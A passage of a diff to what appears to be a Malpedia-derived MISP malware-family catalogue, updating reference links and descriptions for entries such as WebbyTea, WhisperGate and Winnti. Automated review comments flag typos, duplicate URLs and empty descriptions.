"DbgPrint", 
@@ -50164,6 +52620,20 @@ "uuid": "d238262a-4832-408f-9926-a7174e671b50", "value": "WaterSpout" }, + { + "description": "WebbyTea is an HTTP(S) downloader that uses AES for C&C trafic encryption.\r\n\r\nIt sends detailed information about the victim's environment, like proxy settings, system instalation date, Windows product name and version, manufacturer, product name, system boot time, time zone, computer name, user name, current time and a list of currently running processes. Data sent to the C&C server consists of the prefix \"ci\", a 16-characters long hexadecimal string representing the victim ID and an encrypted data about the victim's system. After the payload is acquired from the server and successfully injected in a newly created explorer.exe process, the malware responds back with the same victim ID having the prefix changed to \"cs\".\r\n\r\nThe internal DLL name of the native WebbyTea is usually pe64.dll or webT64.dll (from which its name is derived).\r\n\r\nThe usual payload associated with WebbyTea is SnatchCrypto.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.webbytea", + "https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/", + "https://blog.sekoia.io/bluenoroffs-rustbucket-campaign/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e8056d43-7dd7-49ae-8cd7-07be367fb6b4", + "value": "WebbyTea" + }, { "description": "", "meta": { 
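Review bot: The added WebbyTea description carries two spelling errors, `trafic` in the first paragraph and `instalation` in the second. If this text is mirrored from the entry's Malpedia page, as its first ref suggests, the correction belongs upstream, because a local edit to `traffic` and `installation` would be overwritten at the next regeneration. The behavioural details it records (the `ci`/`cs` beacon prefixes, the 16-character victim ID, injection into a fresh explorer.exe) are the kind of detection-relevant facts that make the description worth keeping accurate.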
@@ -50338,11 +52808,11 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor",
- "https://revcode.se/product/webmonitor/",
+ "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/",
 "https://krebsonsecurity.com/2019/04/whos-behind-the-revcode-webmonitor-rat/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord",
 "https://krabsonsecurity.com/2020/09/04/bitrat-pt-2-hidden-browser-socks5-proxy-and-unknownproducts-unmasked/",
- "https://researchcenter.paloaltonetworks.com/2018/04/unit42-say-cheese-webmonitor-rat-comes-c2-service-c2aas/"
+ "https://revcode.se/product/webmonitor/",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-actors-target-comm-apps-such-as-zoom-slack-discord"
 ],
 "synonyms": [
 "RevCode"
@@ -50370,22 +52840,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wellmess", - "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf", - "https://community.riskiq.com/article/541a465f/description", - "https://securelist.com/apt-trends-report-q2-2020/97937/", - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", - "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", - "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf", - "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", "https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf", + "https://community.riskiq.com/article/541a465f/description", + "https://blog.talosintelligence.com/2020/08/attribution-puzzle.html", + "https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf", + "https://us-cert.cisa.gov/sites/default/files/publications/AA21-116A_Russian_Foreign_Intelligence_Service_Cyber_Operations_508C.pdf", + "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html", + "https://us-cert.cisa.gov/ncas/alerts/aa21-116a", + "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", "https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://us-cert.cisa.gov/ncas/alerts/aa21-116a", - "https://blog.jpcert.or.jp/2018/07/malware-wellmes-9b78.html", - 
"https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b" ], "synonyms": [], "type": [] 
@@ -50424,80 +52894,81 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whispergate", - "https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", - "https://unit42.paloaltonetworks.com/atoms/ruinousursa/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html", - "https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/", - "https://www.youtube.com/watch?v=Ek3URIaC5O8", - "https://www.youtube.com/watch?v=mrTdSdMMgnk", - "https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper", - "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", - "https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", - "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", - "https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months", - "https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf", - "https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/", - "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb", - "https://thehackernews.com/2022/02/putin-warns-russian-critical.html", + "https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped", "https://www.crowdstrike.com/blog/who-is-ember-bear/", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - 
"https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html", - "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html", - "https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/", - "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/", - "https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground", + "https://blogs.blackberry.com/en/2022/01/threat-thursday-whispergate-wiper", "https://cert.gov.ua/article/18101", + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/", + "https://www.recordedfuture.com/whispergate-malware-corrupts-computers-ukraine/", + "https://intel471.com/blog/russia-ukraine-conflict-cybercrime-underground", + "https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md", + "https://inquest.net/blog/2022/02/10/380-glowspark", + "https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview", + "https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/", + "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", + "https://blog.gigamon.com/2022/01/28/focusing-on-left-of-boom/", + "https://www.cadosecurity.com/resources-for-dfir-professionals-responding-to-whispergate-malware/", + "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/", "https://twitter.com/Libranalysis/status/1483128221956808704", - "https://rxored.github.io/post/analysis/whispergate/whispergate/", - 
"https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf", - "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/", - "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/", + "https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/return-of-pseudo-ransomware.html", + "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", + "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", + "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk", + "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", + "https://www.youtube.com/watch?v=Ek3URIaC5O8", "https://blogs.microsoft.com/on-the-issues/2022/01/15/mstic-malware-cyberattacks-ukraine-government/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/update-on-whispergate-destructive-malware-targeting-ukraine.html", + "https://www.netskope.com/blog/netskope-threat-coverage-whispergate", + "https://go.recordedfuture.com/hubfs/reports/pov-2022-0127.pdf", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a", + "https://unit42.paloaltonetworks.com/ukraine-cyber-conflict-cve-2021-32648-whispergate/", + "https://twitter.com/nunohaien/status/1484088885575622657", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-057A_Destructive_Malware_Targeting_Organizations_in_Ukraine.pdf", + 
"https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", + "https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/", + "https://www.bitdefender.com/blog/hotforsecurity/five-things-you-need-to-know-about-the-cyberwar-in-ukraine/", + "https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf", + "https://rxored.github.io/post/analysis/whispergate/whispergate/", + "https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware/", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://twitter.com/HuskyHacksMK/status/1482876242047258628", + "https://www.elastic.co/fr/security-labs/operation-bleeding-bear", + "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation", + "https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions", + "https://lifars.com/2022/01/a-detailed-analysis-of-whispergate-targeting-ukrainian-organizations/", + "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", + "https://stairwell.com/news/whispers-in-the-noise-microsoft-ukraine-whispergate/", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", + "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", + "https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd", + "https://zetter.substack.com/p/hackers-were-in-ukraine-systems-months", + "https://blog.talosintelligence.com/2022/01/ukraine-campaign-delivers-defacement.html", + "https://unit42.paloaltonetworks.com/atoms/ruinousursa/", + "https://github.com/OALabs/Lab-Notes/blob/main/WhisperGate/WhisperGate.ipynb", + 
"https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", + "https://www.youtube.com/watch?v=2nd-f1dIfD4", + "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", + "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", + "https://thehackernews.com/2022/02/putin-warns-russian-critical.html", + "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord?", "https://lifars.com/2022/03/a-closer-look-at-the-russian-actors-targeting-organizations-in-ukraine/", "https://www.brighttalk.com/webcast/15591/534324", - "https://csirt-mon.wp.mil.pl/pl/articles6-aktualnosci/analysis-cyberattack-ukrainian-government-resources/", - "https://cyberpeaceinstitute.org/ukraine-timeline-of-cyberattacks", - "https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf", - "https://www.netskope.com/blog/netskope-threat-coverage-whispergate", - "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", - "https://twitter.com/nunohaien/status/1484088885575622657", - "https://www.microsoft.com/security/blog/2022/01/26/evolved-phishing-device-registration-trick-adds-to-phishers-toolbox-for-victims-without-mfa/", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html", - "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine", - "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/", - "https://info.cyborgsecurity.com/hubfs/Emerging%20Threats/WhisperGate%20Malware%20Update%20-%20Emerging%20Threat.pdf", - "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord", - "https://twitter.com/HuskyHacksMK/status/1482876242047258628", - 
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/", - "https://twitter.com/knight0x07/status/1483401072102502400", - "https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/", - "https://www.secureworks.com/blog/whispergate-not-notpetya", - "https://zetter.substack.com/p/dozens-of-computers-in-ukraine-wiped", - "https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf", - "https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat", "https://therecord.media/second-data-wiper-attack-hits-ukraine-computer-networks/", - "https://www.youtube.com/watch?v=2nd-f1dIfD4", - "https://www.crowdstrike.com/blog/how-crowdstrike-protects-against-data-wiping-malware/", "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html", - "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", - "https://inquest.net/blog/2022/02/10/380-glowspark", - "https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation", - "https://www.elastic.co/fr/security-labs/operation-bleeding-bear", - "https://www.splunk.com/en_us/blog/security/threat-advisory-strt-ta02-destructive-software.html?splunk", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-057a", - "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", - "https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/", "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf", - 
"https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering/blob/main/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator/Debugging%20MBR%20-%20IDA%20+%20Bochs%20Emulator.md", - "https://www.secureworks.com/blog/disruptive-attacks-in-ukraine-likely-linked-to-escalating-tensions" + "https://maxkersten.nl/binary-analysis-course/malware-analysis/dumping-whispergates-wiper-from-an-eazfuscator-obfuscated-loader/", + "https://www.secureworks.com/blog/whispergate-not-notpetya", + "https://www.youtube.com/watch?v=mrTdSdMMgnk", + "https://blogs.blackberry.com/en/2022/02/threat-spotlight-whispergate-wiper-wreaks-havoc-in-ukraine", + "https://blog.nviso.eu/2022/02/24/threat-update-ukraine-russia-tensions/", + "https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/", + "https://www.crowdstrike.com/blog/lessons-from-past-cyber-operations-against-ukraine/", + "https://twitter.com/knight0x07/status/1483401072102502400" ], "synonyms": [ "PAYWIPE" @@ -50512,8 +52983,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird", - "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf", - "https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf" + "https://st.drweb.com/static/new-www/news/2020/september/tek_rf_article_en.pdf", + "https://st.drweb.com/static/new-www/news/2020/july/Study_of_the_APT_attacks_on_state_institutions_in_Kazakhstan_and_Kyrgyzstan_en.pdf" ], "synonyms": [], "type": [] 
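Review bot: The rewritten win.whispergate refs list still holds several references twice under slightly different URLs: `https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord` with and without a trailing `?`, `https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine` with and without a trailing `/`, and the Splunk STRT-TA02 advisory with and without `?splunk`. The commit reorders these entries but does not dedupe them; normalising URLs before emission (dropping an empty query string and a trailing slash) would collapse each pair. The same defect is present in the win.windealer hunk further down, where `https://securelist.com/windealer-dealing-on-the-side/105946` and `105946/` both survive.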
@@ -50526,8 +52997,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.whiteblackcrypt",
- "https://sebdraven.medium.com/whisperkill-vs-whiteblackcrypt-un-petit-soucis-de-fichiers-9c4dcd013316",
- "https://www.checkmal.com/video/read/3605/"
+ "https://www.checkmal.com/video/read/3605/",
+ "https://sebdraven.medium.com/whisperkill-vs-whiteblackcrypt-un-petit-soucis-de-fichiers-9c4dcd013316"
 ],
 "synonyms": [
 "WARYLOOK"
@@ -50537,6 +53008,35 @@
 "uuid": "f587a5a2-907e-456c-91e9-74fd997c03b5",
 "value": "WhiteBlackCrypt"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitesnake",
+ "https://bazaar.abuse.ch/sample/5066eca9c7309af16c882ffae79ceee93d5c8a8bcfe3726455c9b5589a492553/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8f5bb3ec-a764-4ef4-a113-532a3d4b82c4",
+ "value": "WhiteSnake Stealer"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.wikiloader",
+ "https://twitter.com/threatinsight/status/1679864625544978432",
+ "https://www.proofpoint.com/us/blog/threat-insight/out-sandbox-wikiloader-digs-sophisticated-evasion"
+ ],
+ "synonyms": [
+ "WailingCrab"
+ ],
+ "type": []
+ },
+ "uuid": "8dd43a3f-320a-4bdd-8379-b592cd6efc1f",
+ "value": "WikiLoader"
+ },
 {
 "description": "",
 "meta": {
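Review bot: Both new entries, WhiteSnake Stealer and WikiLoader, land with `"description": ""` while the same commit fills in descriptions for Xorist, XpertRAT, YTStealer, Yanluowang and Zebrocy, so consumers rendering the galaxy get a name and links but no summary for two current families. A one-sentence summary taken from the listed references (the Proofpoint post for WikiLoader, the Malpedia page for WhiteSnake) would bring them in line with the rest of this commit. If descriptions are only synced when the upstream source carries one, this is a gap to raise upstream rather than a hand edit here, since the next regeneration would overwrite it.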
@@ -50554,13 +53054,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.windealer", - "https://securelist.com/windealer-dealing-on-the-side/105946/", - "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf", "https://mssplab.github.io/threat-hunting/2023/05/08/malware-analysis-windealer.html", "https://securelist.com/windealer-dealing-on-the-side/105946", + "https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_301_shui-leon_en.pdf", + "https://blogs.jpcert.or.jp/en/2021/10/windealer.html", "https://blogs.blackberry.com/en/2022/06/threat-thursday-china-based-apt-plays-auto-updater-card-to-deliver-windealer-malware", - "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_7_leon-niwa-ishimaru_en.pdf", - "https://blogs.jpcert.or.jp/en/2021/10/windealer.html" + "https://securelist.com/windealer-dealing-on-the-side/105946/", + "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_7_leon-niwa-ishimaru_en.pdf" ], "synonyms": [], "type": [] @@ -50586,9 +53086,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winmm", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", - "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf" ], "synonyms": [], "type": [] 
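Review bot: The reordered win.windealer list still carries both `https://securelist.com/windealer-dealing-on-the-side/105946/` and `https://securelist.com/windealer-dealing-on-the-side/105946`, which differ only by the trailing slash. The same near-duplicate survives in win.yarat (`apt31-cloud-attacks` with and without slash), win.yamabot (`lazarus-three-rats.html` and `lazarus-three-rats.html?m=1`), win.wscspl (the ti.qianxin.com and ti.360.net copies of one article) and win.xtunnel (the symantec-blogs.broadcom.com and www.symantec.com copies of the APT28 post). Normalizing URLs (trailing slash, `?m=1`-style view parameters) before deduplicating, or deduplicating at ingest, would drop these; if the intent is to preserve every upstream URL verbatim, stating that in the exporter's documentation would stop reviewers from re-raising it.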
@@ -50601,60 +53101,60 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.winnti", - "http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/", - "http://2015.ruxcon.org.au/assets/2015/slides/Ruxcon%202015%20-%20McCormack.pdf", - "https://attack.mitre.org/groups/G0096", - "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf", - "https://github.com/TKCERT/winnti-nmap-script", - "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", - "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/", - "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/", - "https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf", "https://docplayer.net/162112338-Don-t-miss-the-forest-for-the-trees-gleaning-hunting-value-from-too-much-intrusion-data.html", - "https://github.com/superkhung/winnti-sniff", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf", - "https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/", - "https://content.fireeye.com/api/pdfproxy?id=86840", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", - "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf", + "https://www.youtube.com/watch?v=_fstHQSK-kk", "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/", - 
"https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf", "https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive", - "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", - "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/", - "https://www.fireeye.com/blog/threat-research/2021/01/emulation-of-kernel-mode-rootkits-with-speakeasy.html", - "https://www.secureworks.com/research/threat-profiles/bronze-atlas", - "https://www.lastline.com/labsblog/helo-winnti-attack-scan/", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", - "https://www.trendmicro.com/en_us/research/19/d/analyzing-c-c-runtime-library-code-tampering-in-software-supply-chain-attacks.html", - "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html", - "https://content.fireeye.com/apt-41/rpt-apt41/", - "https://github.com/br-data/2019-winnti-analyse/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", - "https://github.com/TKCERT/winnti-detector", - "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/operation-harvest-a-deep-dive-into-a-long-term-campaign/", - "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + 
"https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf", + "https://github.com/TKCERT/winnti-suricata-lua", + "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/slides/VB2022-Tracking-the-entire-iceberg.pdf", + "https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/", "https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/", - "https://www.youtube.com/watch?v=_fstHQSK-kk", + "https://content.fireeye.com/api/pdfproxy?id=86840", + "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf", + "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", + "https://www.lastline.com/labsblog/helo-winnti-attack-scan/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0921.pdf", + "https://quointelligence.eu/2020/04/winnti-group-insights-from-the-past/", + "https://github.com/superkhung/winnti-sniff", + "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/", + "https://content.fireeye.com/apt-41/rpt-apt41/", + "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apt41-indictments-china-espionage", + "https://www.tagesschau.de/investigativ/ndr/hackerangriff-chemieunternehmen-101.html", + "https://github.com/TKCERT/winnti-detector", + "https://blogs.vmware.com/security/2021/11/monitoring-winnti-4-0-c2-servers-for-two-years.html", + "https://www.secureworks.com/research/threat-profiles/bronze-atlas", + "https://securelist.com/games-are-over/70991/", + "https://attack.mitre.org/groups/G0096", + 
"https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", + "https://github.com/TKCERT/winnti-nmap-script", + "https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://www.ptsecurity.com/upload/corporate/ru-ru/webinars/ics/winnti-shadowpad.pdf", - "https://www.carbonblack.com/2020/02/20/threat-analysis-active-c2-discovery-using-protocol-emulation-part2-winnti-4-0/", - "http://web.br.de/interaktiv/winnti/english/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape", - "https://securelist.com/games-are-over/70991/", - "https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf", - "https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Tracking-the-entire-iceberg-long-term-APT-malware-C2-protocol-emulation-and-scanning.pdf", - "https://github.com/TKCERT/winnti-suricata-lua", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf", "https://securelist.com/apt-trends-report-q3-2020/99204/", - 